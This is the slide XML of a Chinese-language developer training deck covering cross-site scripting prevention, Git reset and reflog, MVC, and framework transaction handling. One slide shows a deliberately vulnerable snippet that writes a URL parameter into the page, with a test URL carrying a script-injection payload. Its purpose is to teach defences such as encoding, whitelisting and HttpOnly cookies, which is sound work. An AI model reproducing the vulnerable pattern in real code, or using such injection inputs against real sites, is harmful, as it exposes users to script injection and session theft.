          <a:xfrm flipH="1" flipV="1">
            <a:off x="10167973" y="1027906"/>
            <a:ext cx="1185828" cy="484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文字方塊 2088"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1445894" y="3917405"/>
            <a:ext cx="739758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&lt;script&gt;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docmnent.URL.indexOf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>「</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>name=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>」</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>)+5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document.write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document.URL.substring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pos,document.URL.length</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>));</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="zh-TW" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2090" name="文字方塊 2089"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4396819" y="3854394"/>
            <a:ext cx="61843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http//www.test.com/hello.html?name=&lt;script&gt;alert(1)&lt;/script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 fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="20000" spc="600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>eBAF</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="20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1246" y="3868394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E-Business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89339" y="3870468"/>
            <a:ext cx="230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Application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40747" y="3882248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Framework</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="36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978025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Encoding: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>進行特殊字元與符號的跳脫或編碼處理</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>白名單</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>過濾輸入字元（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Regular expression</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>、字串長度）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>cookies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HttpOnly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>禁止前端讀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，防</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>hijacking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>使用安全</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>library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framework</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>閱讀</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>XSS Prevention Cheat Sheet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XSS-Preventive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(web.xml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>filter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JSTL or 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406812"/>
            <a:ext cx="831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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" kern="0" dirty="0" err="1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c:out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bean.userControlledValue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&lt;p&gt;&lt;input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name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"foo"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kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E64320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value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="303336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"${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fn:escapeXml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kern="0" dirty="0" err="1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param.foo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0F74BD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)}"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7D2727"/>
                </a:solidFill>
                <a:latin typeface="inherit"/>
                <a:ea typeface="細明體" panose="02020509000000000000" pitchFamily="49" charset="-120"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;&lt;/p&gt;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564" y="2250618"/>
            <a:ext cx="6943110" cy="25762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88032" y="1281811"/>
            <a:ext cx="4165022" cy="1564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526924" y="2845891"/>
            <a:ext cx="10067210" cy="10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6096000" y="3554159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&gt;&gt;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243:ifnull + 16 -&gt; 259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7978047" y="3992778"/>
            <a:ext cx="391477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1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2326105"/>
            <a:ext cx="10515600" cy="2236370"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="12000" spc="600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Git</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="12000" spc="600" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>-reset</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="12000" spc="600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2868171" y="3834461"/>
            <a:ext cx="3802728" cy="2760885"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="圓角矩形 36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圓角矩形 38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40" name="向右箭號 39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1272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4533900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855075" y="119538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8" name="向右箭號 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3492500" y="1697038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810500" y="1677194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3305454"/>
            <a:ext cx="1330325" cy="85140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" name="直線單箭頭接點 11"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="10" idx="3"/>
            <a:endCxn id="13" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2439987" y="3731158"/>
            <a:ext cx="3094038" cy="186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534025" y="323056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361681" y="2993804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855200" y="323043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3" idx="6"/>
            <a:endCxn id="19" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="6657975" y="3749675"/>
            <a:ext cx="3197225" cy="1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9" idx="4"/>
            <a:endCxn id="42" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10417175" y="426891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323137" y="3000115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979150" y="3501635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305325" y="4534185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(HEAD~1)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305325" y="5672920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D15B3B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(HEAD~2)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="42" name="橢圓 41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9855200" y="442859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855200" y="5626755"/>
            <a:ext cx="1123950" cy="1038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15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>
            <a:stCxn id="42" idx="4"/>
            <a:endCxn id="43" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10417175" y="5467074"/>
            <a:ext cx="0" cy="159681"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="D1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861804" y="4470780"/>
            <a:ext cx="1952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^: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68171" y="6397381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https://github.com/doggy8088/</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="11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8" grpId="0"/>
      <p:bldP spid="19" grpId="0" animBg="1"/>
      <p:bldP spid="33" grpId="0"/>
      <p:bldP spid="34" grpId="0"/>
      <p:bldP spid="35" grpId="0"/>
      <p:bldP spid="36" grpId="0"/>
      <p:bldP spid="42" grpId="0" animBg="1"/>
      <p:bldP spid="43" grpId="0" animBg="1"/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306" y="7598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461419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70400" y="2465615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484381" y="2465614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502052" y="2465849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4" idx="6"/>
            <a:endCxn id="5" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3585369" y="2984854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6"/>
            <a:endCxn id="6" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5594350" y="2984854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2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7608331" y="2984854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44590" y="1917459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147156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44338" y="1511505"/>
            <a:ext cx="161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384524" y="151150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0" name="矩形 29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2156181" y="1002404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549118" y="855301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sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="橢圓 31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2480469" y="5431537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489450" y="5431538"/>
            <a:ext cx="1123950" cy="10384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503431" y="5431537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521102" y="5431772"/>
            <a:ext cx="1123950" cy="1038479"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="1A7C3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stCxn id="32" idx="6"/>
            <a:endCxn id="33" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3604419" y="5950777"/>
            <a:ext cx="885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3" idx="6"/>
            <a:endCxn id="34" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5613400" y="5950777"/>
            <a:ext cx="890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>
          <a:xfrm>
            <a:off x="7627381" y="5950777"/>
            <a:ext cx="893721" cy="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519830" y="4975323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20953" y="4544436"/>
            <a:ext cx="161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8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43" name="矩形 42"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2175231" y="3968327"/>
            <a:ext cx="7943850" cy="2686050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568168" y="3821224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Repository</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="4800" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4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89" y="2277011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23" y="2295752"/>
            <a:ext cx="1377731" cy="13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弧形箭號 (左彎) 47"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10178612" y="2139670"/>
            <a:ext cx="1708588" cy="3594380"/>
          </a:xfrm>
          <a:prstGeom prst="curvedLeftArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1A7C34"/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10303196" y="3458167"/>
            <a:ext cx="1888804" cy="647302"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F8D0D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err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Git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reset</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="32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414328" y="4237205"/>
            <a:ext cx="1267488" cy="913289"/>
            <a:chOff x="10414328" y="4237205"/>
            <a:chExt cx="1267488" cy="913289"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="矩形圖說文字 9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="10414328" y="4237205"/>
              <a:ext cx="1267488" cy="913289"/>
            </a:xfrm>
            <a:prstGeom prst="wedgeRectCallout">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FBD7D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520852" y="4265392"/>
              <a:ext cx="1026104" cy="885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Soft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D13B3B"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Mixed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 smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="D13B3B"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Hard</a:t>
              </a:r>
              <a:endParaRPr lang="zh-TW" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D13B3B"/>
                </a:solidFill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5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3" grpId="0" animBg="1"/>
      <p:bldP spid="44" grpId="0"/>
      <p:bldP spid="48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Reset-Soft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--soft HEAD~2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6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23" name="橢圓 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5016280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52479" y="1540469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693248" y="1540468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0537389" y="154068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insert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>
            <a:stCxn id="23" idx="6"/>
            <a:endCxn id="24" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6043565" y="2015051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6"/>
            <a:endCxn id="25" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="7879764" y="2015051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5" idx="6"/>
            <a:endCxn id="26" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9720532" y="2015051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0648183" y="978104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8489933" y="607064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678851" y="668417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978991" y="66841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34" name="矩形 33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4737294" y="203102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219399" y="69631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36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24" y="1369266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8854655" y="18261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>
            <a:off x="7765120" y="3639056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7277757" y="4961977"/>
            <a:ext cx="20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Commit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780431" y="3080165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pic>
        <p:nvPicPr>
          <p:cNvPr id="3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65" y="1323861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8693248" y="103146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034427" y="636259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6955880" y="1046682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4839084" y="670840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759284" y="6693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3421" y="26865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710016" y="26865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79288" y="26865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961077" y="2680472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30" grpId="0"/>
      <p:bldP spid="31" grpId="0"/>
      <p:bldP spid="32" grpId="0"/>
      <p:bldP spid="33" grpId="0"/>
      <p:bldP spid="54" grpId="0"/>
      <p:bldP spid="51" grpId="0" animBg="1"/>
      <p:bldP spid="52" grpId="0"/>
      <p:bldP spid="53" grpId="0" animBg="1"/>
      <p:bldP spid="56" grpId="0"/>
      <p:bldP spid="57" grpId="0"/>
      <p:bldP spid="57" grpId="1"/>
      <p:bldP spid="58" grpId="0"/>
      <p:bldP spid="58" grpId="1"/>
      <p:bldP spid="61" grpId="0"/>
      <p:bldP spid="62" grpId="0"/>
      <p:bldP spid="39" grpId="0"/>
      <p:bldP spid="39" grpId="1"/>
      <p:bldP spid="40" grpId="0"/>
      <p:bldP spid="4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Reset-Mixed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--HEAD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192138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192138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39" name="向右箭號 38"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3434828" y="3757509"/>
            <a:ext cx="946150" cy="723900"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow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304009" y="5054275"/>
            <a:ext cx="161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1A7C34"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Add</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="4400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1A7C3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2891" y="490359"/>
            <a:ext cx="3231013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加錯檔案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reset HEAD filename</a:t>
            </a:r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rm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
              <a:t> --cached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filename</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="24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  <p:bldP spid="40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--hard HEAD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3807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5" name="圓角矩形 4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6" name="圓角矩形 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8780429" y="3080172"/>
            <a:ext cx="3124200" cy="1727200"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1A7C34"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="1A7C34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7" name="圓角矩形 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8790765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Repository</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2800" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="圓角矩形 37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4459254" y="3080172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Staging area</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>(Cache)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2800" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="橢圓 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5004615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40814" y="1533293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query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681583" y="1533292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mass1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0525724" y="1533507"/>
            <a:ext cx="1027285" cy="9491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mass2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12" idx="6"/>
            <a:endCxn id="13" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6031900" y="2007875"/>
            <a:ext cx="808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6"/>
            <a:endCxn id="14" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="7868099" y="2007875"/>
            <a:ext cx="8134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6"/>
            <a:endCxn id="15" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9708867" y="2007875"/>
            <a:ext cx="816857" cy="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636518" y="970928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478268" y="599888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67186" y="661241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(HEAD~2)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967326" y="661242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HEAD^^^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(HEAD~3)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="矩形 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4725629" y="195926"/>
            <a:ext cx="7260640" cy="2455036"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="1A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207734" y="62455"/>
            <a:ext cx="248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Repository</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="4000" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="25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096" y="1391724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「叉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24" y="1355606"/>
            <a:ext cx="1259239" cy="1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5022762" y="629083"/>
            <a:ext cx="1407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HEAD^</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="1A7C34"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(HEAD~1)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944215" y="1039506"/>
            <a:ext cx="936926" cy="478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1A7C34"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HEAD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49985" y="3097945"/>
            <a:ext cx="3124200" cy="1727200"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="D15B3B"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="D15B3B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Working directory</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="28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2091" y="27050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mass2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91263" y="270811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mass2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954441" y="269787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mass2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979728" y="2680901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738199" y="2703070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312091" y="271016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14" grpId="0" animBg="1"/>
      <p:bldP spid="15" grpId="0" animBg="1"/>
      <p:bldP spid="19" grpId="0"/>
      <p:bldP spid="20" grpId="0"/>
      <p:bldP spid="21" grpId="0"/>
      <p:bldP spid="22" grpId="0"/>
      <p:bldP spid="29" grpId="0"/>
      <p:bldP spid="30" grpId="0"/>
      <p:bldP spid="33" grpId="0" animBg="1"/>
      <p:bldP spid="8" grpId="0"/>
      <p:bldP spid="28" grpId="0"/>
      <p:bldP spid="31" grpId="0"/>
      <p:bldP spid="9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Reset-Hard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reflog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reset --hard HEAD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>@{3}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64" y="2299018"/>
            <a:ext cx="5705430" cy="1583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15" y="230188"/>
            <a:ext cx="3740562" cy="159543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64" y="4355736"/>
            <a:ext cx="6812484" cy="72173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953" y="4355736"/>
            <a:ext cx="3191715" cy="6711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84721" y="3113588"/>
            <a:ext cx="3753498" cy="24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Reset-Hard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2471" y="1825625"/>
            <a:ext cx="1047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如果程式改內容到一半，不小心下了指令 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" b="1" dirty="0" err="1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 reset --hard HEAD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" b="1" dirty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，那我原本改的內容都就都不見了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glow rad="177800">
                    <a:srgbClr val="FF0000">
                      <a:alpha val="60000"/>
                    </a:srgbClr>
                  </a:glow>
                </a:effectLst>
              </a:rPr>
              <a:t>嗎！？</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst>
                <a:glow rad="177800">
                  <a:srgbClr val="FF0000">
                    <a:alpha val="60000"/>
                  </a:srgbClr>
                </a:glow>
              </a:effectLst>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2400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8" y="2800822"/>
            <a:ext cx="11342340" cy="2602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9" y="2800822"/>
            <a:ext cx="11662121" cy="276870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程式邏輯、資料庫存取</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>View: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畫面呈現</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Controller: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控制流程、轉發請求</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="https://coldbox.ortusbooks.com/content/full/images/mvc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6" y="471487"/>
            <a:ext cx="657225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097733" y="6144825"/>
            <a:ext cx="225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https://coldbox.ortusbooks.com/</a:t>
            </a:r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.Q&amp;A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7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Thanks for your attention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92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後端導特定頁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90600" y="1978025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2" y="1580620"/>
            <a:ext cx="11761364" cy="2991037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740486" y="2881799"/>
            <a:ext cx="4052047" cy="17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67063" y="3047283"/>
            <a:ext cx="629321" cy="183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21970" y="3039374"/>
            <a:ext cx="1904910" cy="191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3594110"/>
            <a:ext cx="2575560" cy="221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((((((((</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>交易控制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9" y="1728232"/>
            <a:ext cx="4276725" cy="1952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02135" y="1677353"/>
            <a:ext cx="229376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交易起始，寫在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>try</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>外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55543" y="2074070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資料異動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00483" y="2513132"/>
            <a:ext cx="11079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交易完成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5419" y="2953901"/>
            <a:ext cx="405931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交易失敗，回到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Transaction.begin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r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>狀態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35" y="986512"/>
            <a:ext cx="4286250" cy="172402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 flipV="1">
            <a:off x="6063539" y="1848525"/>
            <a:ext cx="520196" cy="4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680006" y="3752294"/>
            <a:ext cx="10515600" cy="313054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Transaction.getDataSet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zh-TW" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>如何取得連線</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>名稱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((</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>JDBCTransaction</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>userTx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>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DynamicDBModule</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>().</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>getDataSet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>(platform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TransactionHelper.getInstance</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>().</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>getConnName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>(platform</a:t>
